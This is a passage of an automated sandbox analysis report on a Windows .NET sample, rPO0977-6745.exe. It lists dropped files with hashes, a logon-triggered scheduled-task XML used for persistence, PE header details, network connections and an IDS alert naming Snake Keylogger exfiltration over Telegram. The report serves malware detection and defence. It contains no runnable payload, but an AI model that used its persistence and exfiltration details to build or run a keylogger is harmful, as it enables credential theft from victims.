                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.379552885213346
                                            Encrypted:false
                                            SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZLv0Uyus:fLHxvCsIfA2KRHmOug4v1s
                                            MD5:AAAFFE79E3D18F230F56D8ECB5D839E8
                                            SHA1:3DD92E63FC45704ADDDEFEF47E1FEFDD0DC53CA1
                                            SHA-256:C3A29977F6AC4BAEE072027DA5835A69D3D90EA45EEE239E13A4493D4D745B34
                                            SHA-512:71CDEB6FC22E9E39752670E0F1C02ADCEC537B47A7955FB61AD4C44418379B17C108B8A01FFAB225F83B00408F26276B692EF3BA85FCFB21E5D94149739F9FE5
                                            Malicious:false
                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\rPO0977-6745.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1607
                                            Entropy (8bit):5.117862021484575
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTzv
                                            MD5:69B03F7EFC65C7BE15442A77C775FA98
                                            SHA1:1C1A96B73B0EF8F24094B373D163F3B9E95BF0E0
                                            SHA-256:704B8A859F1023FFC53B3A3C533155570D58B93157577BF68FDDE47703AD70F9
                                            SHA-512:C557F0B173A18BCE2338C5073677915BDF3ED881BD0E740559D12734182563D891D26A8667F61950CFB497A9010C2F81B290FC030E05DAC14323503A068FFCB6
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                            Process:C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1607
                                            Entropy (8bit):5.117862021484575
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTzv
                                            MD5:69B03F7EFC65C7BE15442A77C775FA98
                                            SHA1:1C1A96B73B0EF8F24094B373D163F3B9E95BF0E0
                                            SHA-256:704B8A859F1023FFC53B3A3C533155570D58B93157577BF68FDDE47703AD70F9
                                            SHA-512:C557F0B173A18BCE2338C5073677915BDF3ED881BD0E740559D12734182563D891D26A8667F61950CFB497A9010C2F81B290FC030E05DAC14323503A068FFCB6
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                            Process:C:\Users\user\Desktop\rPO0977-6745.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):561664
                                            Entropy (8bit):7.960071259387184
                                            Encrypted:false
                                            SSDEEP:12288:oW2iNeSY+aZrwrrjk1tvGJfrJQS6hNeuugf5pvPN07R+ooqhMU:Z14/4rrjuFGJVN6Lugf/t6RVoql
                                            MD5:978148253C4B65B751FCD3CB4713F614
                                            SHA1:CBD9C5FEE022B52A38ABDEDD536D22310F1B0870
                                            SHA-256:C45DCE6C441601CF7FD1C78D7697B3F3A5B1D27041417EB0CA7F26E98CCF1DE9
                                            SHA-512:6B0D3A2FB5ABFD217C74F73DB630C766F5837955A8D75B210AF77E987BF4C6BDB7E29915A049A7FDECC8C238D71D2C22600002DF485E7A66A07C370F5ECC60D0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 45%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t+...............0.................. ........@.. ....................................@.................................d...O...................................\...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......LM..8Q......E....................................................0............}.....(.......(......r...p.(....(....o......{.....(....o......{....r...p.(....(....o......{.....(....o......{.....(....o......{.....(....o.....*...0..`........(.........( ....o!...........,*....t......o"...r-..p(#.....,...o".....+..(....o$...(%.....+...*.0...........(....o&...o'...o(....+..*...0..;........(.........( ....o!...........,..r-..p.+....t....o)....+..*..0..;........(.........( ...
                                            Process:C:\Users\user\Desktop\rPO0977-6745.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.960071259387184
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            File name:rPO0977-6745.exe
                                            File size:561'664 bytes
                                            MD5:978148253c4b65b751fcd3cb4713f614
                                            SHA1:cbd9c5fee022b52a38abdedd536d22310f1b0870
                                            SHA256:c45dce6c441601cf7fd1c78d7697b3f3a5b1d27041417eb0ca7f26e98ccf1de9
                                            SHA512:6b0d3a2fb5abfd217c74f73db630c766f5837955a8d75b210af77e987bf4c6bdb7e29915a049a7fdecc8c238d71d2c22600002df485e7a66a07c370f5ecc60d0
                                            SSDEEP:12288:oW2iNeSY+aZrwrrjk1tvGJfrJQS6hNeuugf5pvPN07R+ooqhMU:Z14/4rrjuFGJVN6Lugf/t6RVoql
                                            TLSH:44C4234B72B94724C9BC47F9185029288377A82A6872E6970DDC1DCE3F33F459291BA7
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t+................0.................. ........@.. ....................................@................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x48a7b6
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x92C42B74 [Sat Jan 11 04:28:36 2048 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8a7640x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x5bc.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x88c5c0x70.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x887bc0x888006561b6429af4faf63ad7c4e7d569f1eeFalse0.9626312814789377OpenPGP Public Key7.966999305787785IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x8c0000x5bc0x60015bd1a4bd44ca7454290f2b390c3bdf2False0.4231770833333333data4.108214047831133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x8e0000xc0x200f6d459c18e0ad04cc0eba57869f14ef0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x8c0900x32cdata0.4273399014778325
                                            RT_MANIFEST0x8c3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                            2024-07-24T15:08:36.970823+0200TCP2853006ETPRO MALWARE Snake Keylogger Telegram Exfil49735443192.168.2.7149.154.167.220
                                            2024-07-24T15:08:44.499518+0200TCP2853006ETPRO MALWARE Snake Keylogger Telegram Exfil49741443192.168.2.7149.154.167.220
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 24, 2024 15:08:19.046171904 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:19.051496983 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:19.051568985 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:19.051763058 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:19.056691885 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:19.649775028 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:19.665044069 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:19.671444893 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:19.824407101 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:19.878443003 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:19.883709908 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:19.883766890 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:19.884085894 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:19.896883011 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:19.896898031 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.372170925 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.372301102 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.378355980 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.378395081 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.378737926 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.425307035 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.444772959 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.488506079 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.559813023 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.559896946 CEST44349704188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.559958935 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.566076040 CEST49704443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.601377964 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:20.606905937 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:20.756690979 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:20.764653921 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.764753103 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.764838934 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.765067101 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:20.765100956 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:20.800280094 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.274315119 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:21.286633015 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:21.286720037 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:21.419337034 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:21.419559956 CEST44349705188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:21.419641018 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:21.420048952 CEST49705443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:21.423787117 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.424870014 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.431811094 CEST8049702158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:21.431858063 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:21.431910992 CEST4970280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.431967020 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.432101011 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:21.438291073 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:22.064829111 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:22.067312002 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:22.067358017 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:22.070004940 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:22.070269108 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:22.070281982 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:22.112791061 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:22.457161903 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:22.457371950 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:22.458261967 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:22.458373070 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:22.941356897 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:22.942780018 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:22.942814112 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.073792934 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.086041927 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.086126089 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.086457968 CEST4970980192.168.2.7158.101.44.242
